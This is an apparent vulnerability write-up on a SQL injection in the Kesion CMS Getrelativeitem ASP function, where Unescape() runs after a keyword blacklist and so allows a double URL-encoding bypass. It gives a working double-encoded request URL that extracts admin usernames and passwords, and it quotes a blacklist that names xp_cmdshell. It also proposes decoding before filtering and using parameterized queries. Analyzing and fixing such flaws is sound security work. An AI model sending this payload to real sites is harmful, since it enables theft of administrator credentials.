Let's look at the code first.
The code is as follows:

Dim Ks : Set Ks = New Publiccls
Dim Action : Action = Ks.S("Action")
Select Case Action
    Case "Ctoe" : Ctoe
    Case "GetTags" : gettags
    Case "Getrelativeitem" : getrelativeitem   ' problem function
    ' ... skip ...
    Case "Getonlinelist" : getonlinelist
End Select

Sub Getrelativeitem()   ' vulnerable function starts here
    Dim Key : Key = Unescape(Ks.S("Key"))   ' vulnerable location: only Ks.S() is applied, no other filtering
    Dim rtitle : rtitle = LCase(Ks.G("Rtitle"))
    Dim rkey : rkey = LCase(Ks.G("Rkey"))
    Dim Channelid : Channelid = Ks.CHKCLNG(Ks.S("Channelid"))
    Dim Id : Id = Ks.CHKCLNG(Ks.G("ID"))
    Dim Param, rs, sql, k, sqlstr
    If Key <> "" Then
        If (rtitle = "true" Or rkey = "true") Then
            If rtitle = "true" Then
                Param = Param & " title like '%" & Key & "%'"   ' same pattern as a search-type injection
            End If
            If rkey = "true" Then
                If Param = "" Then
                    Param = Param & " keywords like '%" & Key & "%'"
                Else
                    Param = Param & " or keywords like '%" & Key & "%'"
                End If
            End If
        Else
            Param = Param & " keywords like '%" & Key & "%'"
        End If
    End If
    If Param <> "" Then
        Param = " where infoid<>" & Id & " and (" & Param & ")"
    Else
        Param = " where infoid<>" & Id
    End If
    If Channelid <> 0 Then Param = Param & " and channelid=" & Channelid
    Param = Param & " and Verific=1"
    sqlstr = "select top channelid,infoid,title from Ks_iteminfo" & Param & " order by id desc"   ' query built by string concatenation
    Set rs = Server.CreateObject("ADODB.RecordSet")
    rs.Open sqlstr, conn, 1, 1
    If Not rs.Eof Then
        sql = rs.GetRows(-1)
    End If
    rs.Close
Because the value goes through unescape() after KS.S has filtered it, the filter alone has no effect: a character can be URL-encoded twice so that the filtered character never appears in the request as the filter sees it. For example, a single quote can be sent as %2527; the web server decodes it once to %27, which passes the filter, and unescape() then decodes it to '. This is the same double-encoding bypass known from PHP applications.
Injection statement: %') union select 1,2,username+'|'+password from Ks_admin
After double encoding, the request becomes:

/plus/ajaxs.asp?action=getrelativeitem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
KS.S filters first, and only afterwards is Unescape() called to decode:

Public Function S(Str)
    S = Delsql(Replace(Replace(Request(Str), "'", ""), """", ""))
End Function

Function Delsql(Str)
    Dim Splitsqlstr, Splitsqlarr, i
    Splitsqlstr = "Dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|Chr|set |where|xp_cmdshell"
    Splitsqlarr = Split(Splitsqlstr, "|")
    For i = LBound(Splitsqlarr) To UBound(Splitsqlarr)
        If InStr(LCase(Str), Splitsqlarr(i)) > 0 Then
            Die "<script>alert('System warning!\n\n1. The data you submitted contains the malicious characters " & Splitsqlarr(i) & ";\n2. Your data has been recorded;\n3. Your IP: " & GetIP & "\n4. Date of operation: " & Now & ";\nPowered by kesion.com!');window.close();</script>"
        End If
    Next
    Delsql = Str
End Function
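As an added illustration (not code from the page or from Kesion), this Python model reproduces the filter-then-Unescape() order of Getrelativeitem() and KS.S() from the two listings above and contrasts it with decoding to a fixed point before filtering. urllib's unquote stands in for VBScript Unescape(), the keyword list is the page's Delsql() list, and the sample value is constructed.

```python
from urllib.parse import unquote

# Keyword list copied from the page's Delsql() filter, lowercased because Delsql() compares LCase(Str).
DELSQL_KEYWORDS = ("dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|"
                   "count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell").split("|")

def delsql_hit(value):
    """Mimic Delsql(): return the first blacklisted keyword found in value, or None."""
    low = value.lower()
    return next((kw for kw in DELSQL_KEYWORDS if kw in low), None)

def ks_s(raw):
    """Mimic KS.S(): strip both quote characters, then apply the blacklist (raises on a hit)."""
    stripped = raw.replace("'", "").replace('"', "")
    hit = delsql_hit(stripped)
    if hit is not None:
        raise ValueError(hit)
    return stripped

def vulnerable_order(raw):
    """Getrelativeitem() order: KS.S() filters first, Unescape() decodes afterwards.
    urllib's unquote stands in for VBScript Unescape(); it covers the %XX form the page uses."""
    return unquote(ks_s(raw))

def decode_then_filter(raw, max_rounds=4):
    """Hardened order: decode until the value stops changing, then filter.
    This closes the encoding hole only; the query itself still needs parameters."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        raise ValueError("too many encoding layers")
    return ks_s(value)

def compare(raw):
    # Run both orders on one value; a rejected value is reported as 'blocked: <reason>'.
    out = {}
    for name, fn in (("vulnerable", vulnerable_order), ("hardened", decode_then_filter)):
        try:
            out[name] = fn(raw)
        except ValueError as err:
            out[name] = "blocked: %r" % str(err)
    return out

# Constructed sample: the value as the ASP page receives it after the web server's single
# URL decode of a double-encoded parameter. KS.S() sees only '%', digits and letters here.
DOUBLE_ENCODED = "abc%27%29%20or%201%3D1"
```

Reordering only removes the double-encoding bypass; Delsql() remains a keyword blacklist, so the durable fix for Getrelativeitem() is a parameterized query instead of string concatenation.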
So it comes back to the same advice: use the unescape() function with care, or do not use it at all.